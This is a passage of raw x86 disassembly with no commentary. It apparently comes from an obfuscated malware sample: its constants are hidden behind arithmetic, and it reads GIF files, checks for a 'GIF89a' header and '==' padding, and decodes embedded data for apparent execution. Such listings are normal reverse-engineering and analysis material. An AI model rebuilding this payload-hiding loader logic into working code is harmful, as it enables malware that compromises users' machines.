movzx eax, [ebp+eax+var_50E9B]
mov edx, ds:1001210Ch
add edx, 1Dh
cmp eax, edx
jnz short loc_41B2A9
mov [ebp+var_60EAC], 1
loc_41B2A9: ; CODE XREF: sub_41A910+98D�j
inc [ebp+var_40E9C]
loc_41B2AF: ; CODE XREF: sub_41A910+781�j
mov eax, [ebp+var_60EA8]
cmp [ebp+var_40E9C], eax
jb loc_41B096
mov eax, [ebp+var_60EB4]
movsx edx, word ptr ds:100120B8h
add edx, ds:100120ECh
sub edx, 2
mov [ebp+eax+var_50E9B], dl
loc_41B2DE: ; CODE XREF: sub_41A910+52E�j
mov eax, [ebp+var_60ED4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B2EA: ; CODE XREF: sub_41A910+500�j
and [ebp+var_60EB0], 0
lea eax, [ebp+var_60EB0]
push eax
push 100138B0h
mov eax, [ebp+var_60EC0]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
mov eax, ds:10012104h
add eax, ds:100120B0h
sub eax, 7
cmp ebx, eax
jnz loc_41B600
lea eax, [ebp+var_60EBC]
push eax
mov eax, [ebp+var_60EB0]
push eax
mov edi, [eax]
call dword ptr [edi+6Ch]
mov ebx, eax
movsx eax, word ptr ds:100120E0h
sub eax, 8
cmp ebx, eax
jnz loc_41B5F4
mov eax, ds:100120BCh
add eax, ds:10012098h
sub eax, 6
mov [ebp-50EA0h], eax
jmp loc_41B5E2
; ---------------------------------------------------------------------------
loc_41B365: ; CODE XREF: sub_41A910+CDE�j
push dword ptr ds:10012128h
call dword ptr ds:10011630h
pop ecx
mov [ebp+var_70F08], 2
mov eax, [ebp-50EA0h]
mov [ebp+var_70F00], eax
lea eax, [ebp+var_70EF8]
push eax
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
lea esi, [ebp+var_70F08]
sub esp, 10h
mov edi, esp
mov ecx, 4
rep movsd
mov edi, [ebp+var_60EB0]
push edi
mov edi, [edi]
call dword ptr [edi+74h]
mov ebx, eax
movsx eax, word ptr ds:100120A4h
sub eax, 5
cmp ebx, eax
jnz loc_41B5DC
and [ebp+var_70EF4], 0
lea eax, [ebp+var_70EF4]
push eax
push 10013890h
mov eax, [ebp+var_70EF8]
push eax
mov edi, [eax]
call dword ptr ds:0[edi]
mov ebx, eax
movsx eax, word ptr ds:1001214Ch
sub eax, 4
cmp ebx, eax
jnz loc_41B5D0
lea eax, [ebp+var_60EF0]
push eax
mov eax, ds:100120BCh
movsx edx, word ptr ds:100120A0h
add eax, edx
sub eax, 6
push eax
push [ebp+var_30E44]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
or ebx, ebx
jnz short loc_41B444
cmp [ebp+var_60EF0], 8
jz short loc_41B449
loc_41B444: ; CODE XREF: sub_41A910+B28�j
jmp loc_41B5C4
; ---------------------------------------------------------------------------
loc_41B449: ; CODE XREF: sub_41A910+B32�j
mov eax, ds:100120ECh
add eax, ds:10012124h
movsx edx, word ptr ds:1001212Ch
sub edx, 4
mov byte ptr [ebp+eax+var_70EF4+3], dl
lea eax, [ebp+var_70EEF]
push eax
push [ebp+var_60EE8]
call sub_41CA6C
add esp, 8
mov edi, eax
inc edi
mov [ebp+var_71F0C], edi
push [ebp+var_60EE8]
call dword ptr ds:10011BA0h
mov eax, ds:10012148h
movsx edx, word ptr ds:100120E4h
add eax, edx
movsx eax, byte ptr [ebp+eax+var_70EF8+1]
mov edx, ds:100120D8h
sub edx, 3
cmp eax, edx
jz loc_41B5C4
push [ebp+var_30E4C]
lea eax, [ebp+var_70EEF]
push eax
call sub_41E6BD
add esp, 8
lea eax, [ebp+var_60EF0]
push eax
movsx eax, word ptr ds:100120CCh
sub eax, 7
push eax
push [ebp+var_30E48]
mov eax, [ebp+var_70EF4]
push eax
mov edi, [eax]
call dword ptr [edi+20h]
mov ebx, eax
movsx eax, word ptr ds:100120A0h
movsx edx, word ptr ds:100120B8h
add eax, edx
mov edx, ds:100120ACh
add edx, ds:10012134h
sub edx, 6
mov [ebp+eax+var_71F0E], dl
or ebx, ebx
jnz short loc_41B54F
cmp [ebp+var_60EF0], 8
jnz short loc_41B54F
lea eax, [ebp+var_71F07]
push eax
push [ebp+var_60EE8]
call sub_41CA6C
add esp, 8
mov edi, eax
inc edi
mov [ebp-71F10h], edi
push [ebp+var_60EE8]
call dword ptr ds:10011BA0h
loc_41B54F: ; CODE XREF: sub_41A910+C09�j
; sub_41A910+C13�j
push 10013775h
call sub_41E33D
push dword ptr [ebp-50EA0h]
push eax
lea edi, [ebp+var_30E3F]
push edi
call dword ptr ds:10011634h
lea eax, [ebp+var_30E3F]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
lea eax, [ebp+var_71F07]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
push 10013770h
call sub_41E33D
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000C020h
lea eax, [ebp+var_70EEF]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
add esp, 34h
loc_41B5C4: ; CODE XREF: sub_41A910:loc_41B444�j
; sub_41A910+BA0�j
mov eax, [ebp+var_70EF4]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B5D0: ; CODE XREF: sub_41A910+AF3�j
mov eax, [ebp+var_70EF8]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B5DC: ; CODE XREF: sub_41A910+ABC�j
inc dword ptr [ebp-50EA0h]
loc_41B5E2: ; CODE XREF: sub_41A910+A50�j
mov eax, [ebp+var_60EBC]
cmp [ebp-50EA0h], eax
jb loc_41B365
loc_41B5F4: ; CODE XREF: sub_41A910+A36�j
mov eax, [ebp+var_60EB0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B600: ; CODE XREF: sub_41A910+A0F�j
mov eax, [ebp+var_60EC0]
push eax
mov esi, [eax]
call dword ptr [esi+8]
movzx eax, [ebp+var_50E9B]
mov edx, ds:100120A8h
sub edx, 4
cmp eax, edx
jz short loc_41B661
push 1001376Dh
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
lea eax, [ebp+var_50E9B]
push eax
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1000C020h
push 10013768h
call sub_41E33D
push eax
lea edi, [ebp+var_30D40]
push edi
call dword ptr ds:1000C020h
add esp, 1Ch
loc_41B661: ; CODE XREF: sub_41A910+496�j
; sub_41A910+D0E�j
inc [ebp+var_30E50]
loc_41B667: ; CODE XREF: sub_41A910+415�j
mov eax, [ebp+var_30E58]
cmp [ebp+var_30E50], eax
jb loc_41AD2A
loc_41B679: ; CODE XREF: sub_41A910+29E�j
; sub_41A910+322�j ...
inc [ebp+var_40E5C]
mov eax, [ebp+var_40E90]
cmp [ebp+var_40E5C], eax
jl loc_41AB6D
lea eax, [ebp+var_30D40]
push eax
call dword ptr ds:1001162Ch
pop ecx
push [ebp+var_30E44]
call dword ptr ds:10011BA0h
push [ebp+var_30E48]
call dword ptr ds:10011BA0h
loc_41B6B7: ; CODE XREF: sub_41A910+203�j
mov eax, [ebp+var_40E70]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B6C3: ; CODE XREF: sub_41A910+1D5�j
mov eax, [ebp+var_40E6C]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B6CF: ; CODE XREF: sub_41A910+1B0�j
mov eax, [ebp+var_40E68]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B6DB: ; CODE XREF: sub_41A910+CB�j
; sub_41A910:loc_41AA2F�j ...
mov eax, [ebp+var_40E64]
push eax
mov esi, [eax]
call dword ptr [esi+8]
loc_41B6E7: ; CODE XREF: sub_41A910+51�j
; sub_41A910+9B�j
pop edi
pop esi
pop ebx
leave
retn
sub_41A910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B6EC proc near ; CODE XREF: .data:0041BDF9�p
; sub_41BEF1+1A5�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov eax, ds:100120ECh
add eax, ds:10012128h
mov [ebp+var_8], eax
mov [ebp+var_C], eax
mov esi, eax
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_8]
add eax, ebx
mov [ebp+var_4], eax
mov edi, [ebp+arg_0]
jmp loc_41B820
; ---------------------------------------------------------------------------
loc_41B71B: ; CODE XREF: sub_41B6EC+13C�j
movsx edx, byte ptr [edi]
shl edx, 2
mov esi, ds:10012278h[edx]
movsx eax, word ptr ds:100120E0h
sub eax, 7
neg eax
cmp esi, eax
jz loc_41B81F
mov eax, [ebp+var_8]
or eax, eax
jl loc_41B81C
cmp eax, 3
jg loc_41B81C
jmp dword ptr ds:10012678h[eax*4]
; ---------------------------------------------------------------------------
db 0FFh
dd 0BDE9F845h, 8B000000h, 0BF0FF455h, 121200Dh, 6E98310h
dd 0E0D3D089h, 89E84589h, 30E283F2h, 209C0D8Bh, 0BF0F1001h
dd 1211405h, 83C10110h, 0D08902E9h, 558BF8D3h, 88C209E8h
dd 0D889F355h, 0F3558A43h, 45FF1088h, 8B79EBF8h, 0E283F455h
dd 0DBF0F0Fh, 10012114h, 12094A1h, 14C8D10h, 0D3D08901h
dd 0E44589E0h, 0E283F289h, 0DBF0F3Ch, 100120B4h, 8903E983h
dd 8BF8D3D0h, 0C209E455h, 89F35588h, 558A43D8h, 0FF1088F3h
dd 34EBF845h, 83F4558Bh, 0BF0F03E2h, 120900Dh, 4C18310h
dd 0E0D3D089h, 0F209C289h, 89F35588h, 558A43D8h, 0A11088F3h
dd 10012148h, 209C0503h, 0E8831001h, 0F8458905h
; ---------------------------------------------------------------------------
loc_41B81C: ; CODE XREF: sub_41B6EC+55�j
; sub_41B6EC+5E�j
mov [ebp+var_C], esi
loc_41B81F: ; CODE XREF: sub_41B6EC+4A�j
inc edi
loc_41B820: ; CODE XREF: sub_41B6EC+2A�j
cmp byte ptr [edi], 0
jz short loc_41B82E
cmp ebx, [ebp+var_4]
jb loc_41B71B
loc_41B82E: ; CODE XREF: sub_41B6EC+137�j
cmp byte ptr [edi], 0
jnz short loc_41B83A
mov eax, ebx
sub eax, [ebp+arg_4]
jmp short loc_41B846
; ---------------------------------------------------------------------------
loc_41B83A: ; CODE XREF: sub_41B6EC+145�j
movsx eax, word ptr ds:100120E0h
sub eax, 7
neg eax
loc_41B846: ; CODE XREF: sub_41B6EC+14C�j
pop edi
pop esi
pop ebx
leave
retn
sub_41B6EC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B84B proc near ; CODE XREF: sub_422D6E+2FD�p
; sub_422D6E+3EE�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov edi, ds:100120DCh
add edi, ds:100120F8h
sub edi, 0Fh
cmp edx, edi
jnz short loc_41B875
mov eax, [ebp+arg_0]
jmp short loc_41B88F
; ---------------------------------------------------------------------------
loc_41B875: ; CODE XREF: sub_41B84B+23�j
mov eax, [ebp+arg_0]
xor edx, edx
div esi
mov [ebp+var_8], eax
mov edi, eax
mul esi
mov [ebp+var_C], eax
mov edi, eax
add edi, esi
mov [ebp+var_4], edi
mov eax, edi
loc_41B88F: ; CODE XREF: sub_41B84B+28�j
pop edi
pop esi
leave
retn
sub_41B84B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B893 proc near ; CODE XREF: sub_422550+9B�p
; sub_422550+D2�p ...
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push edi
movzx eax, [ebp+arg_0]
mov ecx, 0Ah
mov edx, 0CCCCCCCDh
mul edx
shr edx, 3
mov [ebp+var_4], edx
mov edi, edx
add edi, 61h
mov ebx, edi
mov [ebp+arg_0], bl
mov al, [ebp+arg_0]
cmp al, 65h
jz short loc_41B8D4
cmp al, 79h
jz short loc_41B8D4
cmp al, 75h
jz short loc_41B8D4
cmp al, 69h
jz short loc_41B8D4
cmp al, 6Fh
jz short loc_41B8D4
cmp al, 61h
jnz short loc_41B8D8
loc_41B8D4: ; CODE XREF: sub_41B893+2B�j
; sub_41B893+2F�j ...
add [ebp+arg_0], 1
loc_41B8D8: ; CODE XREF: sub_41B893+3F�j
cmp [ebp+arg_0], 6Ah
jnz short loc_41B8E2
add [ebp+arg_0], 1
loc_41B8E2: ; CODE XREF: sub_41B893+49�j
movzx eax, [ebp+arg_0]
pop edi
pop ebx
leave
retn
sub_41B893 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B8EA proc near ; CODE XREF: sub_41DD73+174�p
var_170 = byte ptr -170h
var_16C = dword ptr -16Ch
var_168 = byte ptr -168h
var_104 = byte ptr -104h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 170h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_168]
push eax
call sub_424555
push 10013763h
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_168]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 1001375Bh
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
push 0
movsx eax, word ptr ds:10012114h
sub eax, 3
push eax
push 3
push 0
mov eax, ds:100120ACh
sub eax, 2
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41B9A3
mov eax, ds:100120C0h
sub eax, 3
mov edx, [ebp+arg_0]
mov ecx, ds:100120D0h
mov [edx+eax], cl
jmp short loc_41BA12
; ---------------------------------------------------------------------------
loc_41B9A3: ; CODE XREF: sub_41B8EA+A1�j
push 0
push 0
push [ebp+arg_4]
push edi
call dword ptr ds:10011B9Ch
push 0
lea eax, [ebp+var_170]
push eax
movsx eax, word ptr ds:10012108h
add eax, 0Fh
push eax
push [ebp+arg_0]
push edi
call dword ptr ds:1000C028h
mov [ebp+var_16C], eax
push edi
call dword ptr ds:10010650h
movsx eax, word ptr ds:100120E4h
sub eax, 6
cmp [ebp+var_16C], eax
jnz short loc_41BA12
mov eax, ds:10012100h
add eax, ds:100120B0h
sub eax, 8
mov edx, [ebp+arg_0]
movsx ecx, word ptr ds:100120A4h
add ecx, ds:10012128h
sub ecx, 5
mov [edx+eax], cl
loc_41BA12: ; CODE XREF: sub_41B8EA+B7�j
; sub_41B8EA+102�j
pop edi
pop esi
leave
retn
sub_41B8EA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BA16 proc near ; CODE XREF: sub_41BEF1+113�p
var_270 = byte ptr -270h
var_26C = dword ptr -26Ch
var_267 = byte ptr -267h
var_203 = byte ptr -203h
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 270h
push esi
push edi
push 104h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000E5FCh
lea eax, [ebp+var_267]
push eax
call sub_424555
push 10013756h
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
lea eax, [ebp+var_267]
push eax
lea eax, [ebp+var_104]
push eax
call dword ptr ds:1000C020h
push 1001374Eh
call sub_41E33D
push eax
lea esi, [ebp+var_104]
push esi
call dword ptr ds:1000C020h
add esp, 24h
push 0
push dword ptr ds:100120ECh
push 3
push 0
mov eax, ds:100120A8h
movsx edx, word ptr ds:1001212Ch
add eax, edx
sub eax, 8
push eax
push 80000000h
lea eax, [ebp+var_104]
push eax
call dword ptr ds:10011788h
mov edi, eax
cmp edi, 0FFFFFFFFh
jnz short loc_41BAC4
mov eax, 2Ah
jmp short loc_41BB2E
; ---------------------------------------------------------------------------
loc_41BAC4: ; CODE XREF: sub_41BA16+A5�j
push 0
lea eax, [ebp+var_270]
push eax
push 0FFh
lea eax, [ebp+var_203]
push eax
push edi
call dword ptr ds:1000C028h
mov [ebp+var_26C], eax
push edi
call dword ptr ds:10010650h
mov eax, ds:10012110h
sub eax, 8
cmp [ebp+var_26C], eax
jnz short loc_41BB04
mov eax, 2Ah
jmp short loc_41BB2E
; ---------------------------------------------------------------------------
loc_41BB04: ; CODE XREF: sub_41BA16+E5�j
movzx eax, [ebp+var_203]
movsx edx, word ptr ds:1001213Ch
mov ecx, ds:10012124h
lea edx, [edx+ecx+18h]
cmp eax, edx
jge short loc_41BB27
mov eax, 2Ah
jmp short loc_41BB2E
; ---------------------------------------------------------------------------
loc_41BB27: ; CODE XREF: sub_41BA16+108�j
movzx eax, [ebp+var_203]
loc_41BB2E: ; CODE XREF: sub_41BA16+AC�j
; sub_41BA16+EC�j ...
pop edi
pop esi
leave
retn
sub_41BA16 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BB32 proc near ; CODE XREF: sub_41C388+25A�p
; sub_420923+2BA�p
var_330 = dword ptr -330h
var_32C = dword ptr -32Ch
var_328 = dword ptr -328h
var_324 = dword ptr -324h
var_320 = dword ptr -320h
var_31C = dword ptr -31Ch
var_316 = byte ptr -316h
var_212 = byte ptr -212h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 330h
push ebx
push esi
push edi
push [ebp+arg_4]
call dword ptr ds:10011630h
pop ecx
push [ebp+arg_0]
lea eax, [ebp+var_316]
push eax
call sub_42509D
lea ecx, [ebp+var_316]
or eax, 0FFFFFFFFh
loc_41BB60: ; CODE XREF: sub_41BB32+33�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41BB60
movsx edx, word ptr ds:10012120h
movsx ecx, word ptr ds:100120B8h
add edx, ecx
sub edx, 9
mov ebx, eax
sub ebx, edx
movsx edx, word ptr ds:100120F4h
mov [ebp+ebx+var_316], dl
mov edi, ds:10012138h
sub edi, 2
loc_41BB95: ; CODE XREF: sub_41BB32+16E�j
mov eax, edi
mov ecx, ds:100120D0h
movsx ebx, word ptr ds:100120A0h
add ecx, ebx
sub ecx, 3
mul ecx
mov [ebp+var_320], eax
movsx eax, [ebp+edi+var_316]
mov edx, [ebp+var_320]
mov [ebp+edx+var_212], al
mov eax, edi
movsx ecx, word ptr ds:100120E0h
sub ecx, 6
mul ecx
mov [ebp+var_324], eax
mov eax, ds:100120A8h
sub eax, 3
mov edx, [ebp+var_324]
add edx, eax
mov eax, ds:100120C4h
sub eax, 4
mov [ebp+edx+var_212], al
movsx eax, [ebp+edi+var_316]
movsx edx, word ptr ds:10012130h
sub edx, 4
cmp eax, edx
jnz loc_41BC9F
mov eax, edi
mov ecx, ds:100120BCh
inc ecx
mul ecx
mov [ebp+var_328], eax
movsx eax, word ptr ds:1001212Ch
sub eax, 2
mov edx, [ebp+var_328]
add edx, eax
mov eax, ds:100120C8h
movsx ecx, word ptr ds:10012140h
add eax, ecx
sub eax, 0Bh
mov [ebp+edx+var_212], al
mov eax, ds:100120D0h
mov [ebp+var_32C], eax
mov eax, edi
mov ecx, ds:10012144h
add ecx, 2
mov edx, [ebp+var_32C]
add ecx, edx
mul ecx
mov [ebp+var_330], eax
movsx eax, word ptr ds:100120E4h
mov edx, [ebp+var_32C]
add eax, edx
sub eax, 3
mov edx, [ebp+var_330]
add edx, eax
mov eax, ds:100120DCh
sub eax, 8
mov [ebp+edx+var_212], al
jmp short loc_41BCA5
; ---------------------------------------------------------------------------
loc_41BC9F: ; CODE XREF: sub_41BB32+DB�j
inc edi
jmp loc_41BB95
; ---------------------------------------------------------------------------
loc_41BCA5: ; CODE XREF: sub_41BB32+16B�j
cmp dword ptr ds:1001216Ch, 0
jz short loc_41BCE4
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000E600h
mov esi, eax
or esi, esi
jz short loc_41BCE4
cmp dword ptr ds:10012170h, 0
jz short loc_41BD05
mov eax, ds:100120D4h
inc eax
neg eax
push eax
lea eax, [ebp+var_212]
push eax
push 0
call dword ptr ds:1000C01Ch
loc_41BCE4: ; CODE XREF: sub_41BB32+17A�j
; sub_41BB32+18F�j
push dword ptr ds:1000E610h
push dword ptr ds:10011610h
lea eax, [ebp+var_316]
push eax
call sub_422D6E
add esp, 0Ch
mov [ebp+var_31C], eax
loc_41BD05: ; CODE XREF: sub_41BB32+198�j
pop edi
pop esi
pop ebx
leave
retn
sub_41BB32 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push ebx
push esi
push edi
lea eax, [ebp-210h]
push eax
push 1000E0F0h
call sub_41E027
add esp, 8
mov [ebp-208h], eax
test eax, eax
jnz short loc_41BD3B
xor eax, eax
jmp loc_41BEC5
; ---------------------------------------------------------------------------
loc_41BD3B: ; CODE XREF: .data:0041BD32�j
movsx eax, word ptr ds:1001211Ch
mov edx, ds:10012094h
lea eax, [eax+edx+2]
mov [ebp-204h], eax
loc_41BD52: ; CODE XREF: .data:0041BEB1�j
mov eax, [ebp-204h]
mov edx, [ebp-208h]
lea ecx, [edx+eax]
or eax, 0FFFFFFFFh
loc_41BD64: ; CODE XREF: .data:0041BD69�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41BD64
mov [ebp-20Ch], eax
cmp dword ptr [ebp-20Ch], 0FFh
jnb short loc_41BDA2
mov eax, [ebp-204h]
movsx edx, word ptr ds:10012090h
sub edx, 1
add eax, edx
add eax, [ebp-208h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_42509D
loc_41BDA2: ; CODE XREF: .data:0041BD7B�j
mov esi, ds:10012100h
sub esi, 3
jmp short loc_41BDD2
; ---------------------------------------------------------------------------
loc_41BDAD: ; CODE XREF: .data:0041BDE4�j
cmp byte ptr [ebp+esi-0FFh], 28h
jnz short loc_41BDBF
mov byte ptr [ebp+esi-0FFh], 2Bh
loc_41BDBF: ; CODE XREF: .data:0041BDB5�j
cmp byte ptr [ebp+esi-0FFh], 29h
jnz short loc_41BDD1
mov byte ptr [ebp+esi-0FFh], 3Dh
loc_41BDD1: ; CODE XREF: .data:0041BDC7�j
inc esi
loc_41BDD2: ; CODE XREF: .data:0041BDAB�j
lea ecx, [ebp-0FFh]
or eax, 0FFFFFFFFh
loc_41BDDB: ; CODE XREF: .data:0041BDE0�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_41BDDB
cmp esi, eax
jb short loc_41BDAD
push 0FFh
lea eax, [ebp-1FEh]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_41B6EC
add esp, 0Ch
mov ebx, eax
mov edi, ds:100120B0h
sub edi, 5
jmp short loc_41BE3C
; ---------------------------------------------------------------------------
loc_41BE0E: ; CODE XREF: .data:0041BE3E�j
movsx eax, byte ptr [ebp+edi-1FEh]
mov [ebp-218h], eax
mov eax, edi
mul edi
mov [ebp-21Ch], eax
mov eax, [ebp-218h]
mov edx, [ebp-21Ch]
sub eax, edx
mov [ebp+edi-1FEh], al
inc edi
loc_41BE3C: ; CODE XREF: .data:0041BE0C�j
cmp edi, ebx
jb short loc_41BE0E
movsx eax, word ptr ds:10012090h
dec eax
push eax
push dword ptr [ebp+8]
lea eax, [ebp-1FEh]
push eax
call sub_41FCE7
add esp, 0Ch
mov [ebp-214h], eax
mov eax, ds:10012104h
add eax, 0FFFDh
cmp [ebp-214h], eax
jz short loc_41BE84
push dword ptr [ebp-208h]
call dword ptr ds:1000E618h
xor eax, eax
inc eax
jmp short loc_41BEC5
; ---------------------------------------------------------------------------
loc_41BE84: ; CODE XREF: .data:0041BE71�j
mov eax, [ebp-20Ch]
movsx edx, word ptr ds:100120F0h
movsx ecx, word ptr ds:100120A4h
add edx, ecx
sub edx, 5
add eax, edx
add [ebp-204h], eax
mov eax, [ebp-210h]
cmp [ebp-204h], eax
jb loc_41BD52
push dword ptr [ebp-208h]
call dword ptr ds:1000E618h
xor eax, eax
loc_41BEC5: ; CODE XREF: .data:0041BD36�j
; .data:0041BE82�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
dw 1B8h
dd 0C2800040h, 1B80008h, 0C2800040h
db 10h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 10011BA8h
call dword ptr ds:1000EA3Ch
mov eax, ds:10011BA8h
pop ebp
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41BEF1 proc near ; CODE XREF: sub_421291+225�p
; sub_421291+237�p
var_61DA0 = dword ptr -61DA0h
var_61D9C = dword ptr -61D9Ch
var_61D98 = byte ptr -61D98h
var_61C99 = byte ptr -61C99h
var_61C98 = dword ptr -61C98h
var_61C91 = byte ptr -61C91h
var_30F51 = byte ptr -30F51h
var_30F50 = dword ptr -30F50h
var_30F4B = byte ptr -30F4Bh
var_30E4C = dword ptr -30E4Ch
var_30E48 = dword ptr -30E48h
var_30E44 = dword ptr -30E44h
var_30E3F = byte ptr -30E3Fh
var_30E3E = byte ptr -30E3Eh
var_30E3D = byte ptr -30E3Dh
var_30E3C = byte ptr -30E3Ch
var_30E3B = byte ptr -30E3Bh
var_30E3A = byte ptr -30E3Ah
var_30E15 = byte ptr -30E15h
var_30E14 = byte ptr -30E14h
var_30DBF = byte ptr -30DBFh
var_30DBE = byte ptr -30DBEh
var_30DBD = byte ptr -30DBDh
var_30DBC = byte ptr -30DBCh
var_30D47 = byte ptr -30D47h
var_30D46 = byte ptr -30D46h
var_30D40 = byte ptr -30D40h
var_30D3F = byte ptr -30D3Fh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 61DA0h
call sub_42507D
push ebx
push esi
push edi
mov ebx, [ebp+arg_4]
and [ebp+var_30F50], 0
push 0
mov eax, ds:10012124h
sub eax, 2
push eax
push 3
push 0
movsx eax, word ptr ds:100120A0h
sub eax, 5
push eax
push 80000000h
push [ebp+arg_0]
call dword ptr ds:10011788h
mov [ebp+var_30E48], eax
cmp eax, 0FFFFFFFFh
jz loc_41C383
push 0
lea eax, [ebp+var_30E4C]
push eax
movsx eax, word ptr ds:10012140h
add eax, 7Dh
push eax
lea eax, [ebp+var_30E3F]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000C028h
mov [ebp+var_30E44], eax
movsx eax, word ptr ds:100120E4h
sub eax, 6
cmp [ebp+var_30E44], eax
jz loc_41C365
cmp [ebp+var_30E3F], 47h
jnz short loc_41BFBB
cmp [ebp+var_30E3E], 49h
jnz short loc_41BFBB
cmp [ebp+var_30E3D], 46h
jnz short loc_41BFBB
cmp [ebp+var_30E3C], 38h
jnz short loc_41BFBB
cmp [ebp+var_30E3B], 39h
jnz short loc_41BFBB
cmp [ebp+var_30E3A], 61h
jz short loc_41BFC0
loc_41BFBB: ; CODE XREF: sub_41BEF1+9B�j
; sub_41BEF1+A4�j ...
jmp loc_41C365
; ---------------------------------------------------------------------------
loc_41BFC0: ; CODE XREF: sub_41BEF1+C8�j
movzx eax, [ebp+var_30E15]
mov edx, ds:100120C8h
add edx, 2Fh
movsx ecx, word ptr ds:10012120h
add edx, ecx
cmp eax, edx
jnz short loc_41BFEF
cmp [ebp+var_30DBE], 3Dh
jnz short loc_41BFEF
cmp [ebp+var_30DBD], 3Dh
jz short loc_41BFF4
loc_41BFEF: ; CODE XREF: sub_41BEF1+EA�j
; sub_41BEF1+F3�j
jmp loc_41C365
; ---------------------------------------------------------------------------
loc_41BFF4: ; CODE XREF: sub_41BEF1+FC�j
or ebx, ebx
jnz short loc_41C023
mov al, [ebp+var_30DBC]
mov [ebp+var_30F51], al
call sub_41BA16
mov edx, eax
mov [ebp+var_61C99], dl
mov al, [ebp+var_61C99]
cmp al, [ebp+var_30F51]
jz loc_41C365
loc_41C023: ; CODE XREF: sub_41BEF1+105�j
push 0
lea eax, [ebp+var_30E4C]
push eax
push 30D40h
lea eax, [ebp+var_61C91]
push eax
push [ebp+var_30E48]
call dword ptr ds:1000C028h
mov [ebp+var_30E44], eax
mov eax, ds:10012094h
movsx edx, word ptr ds:100120A4h
add eax, edx
sub eax, 5
cmp [ebp+var_30E44], eax
jz loc_41C365
mov eax, [ebp+var_30E4C]
mov edx, ds:100120A8h
add edx, ds:100120C0h
sub edx, 7
mov [ebp+eax+var_61C91], dl
push 30D40h
lea eax, [ebp+var_30D40]
push eax
lea eax, [ebp+var_61C91]
push eax
call sub_41B6EC
add esp, 0Ch
mov esi, eax
mov edi, ds:100120BCh
dec edi
jmp short loc_41C0EE
; ---------------------------------------------------------------------------
loc_41C0A9: ; CODE XREF: sub_41BEF1+1FF�j
or ebx, ebx
jz short loc_41C0C0
movzx eax, [ebp+edi+var_30D40]
sub eax, edi
mov [ebp+edi+var_30D40], al
jmp short loc_41C0ED
; ---------------------------------------------------------------------------
loc_41C0C0: ; CODE XREF: sub_41BEF1+1BA�j
movzx eax, [ebp+edi+var_30D40]
mov [ebp+var_61D9C], eax
mov eax, edi
mul edi
mov [ebp+var_61DA0], eax
mov eax, [ebp+var_61D9C]
mov edx, [ebp+var_61DA0]
sub eax, edx
mov [ebp+edi+var_30D40], al
loc_41C0ED: ; CODE XREF: sub_41BEF1+1CD�j
inc edi
loc_41C0EE: ; CODE XREF: sub_41BEF1+1B6�j
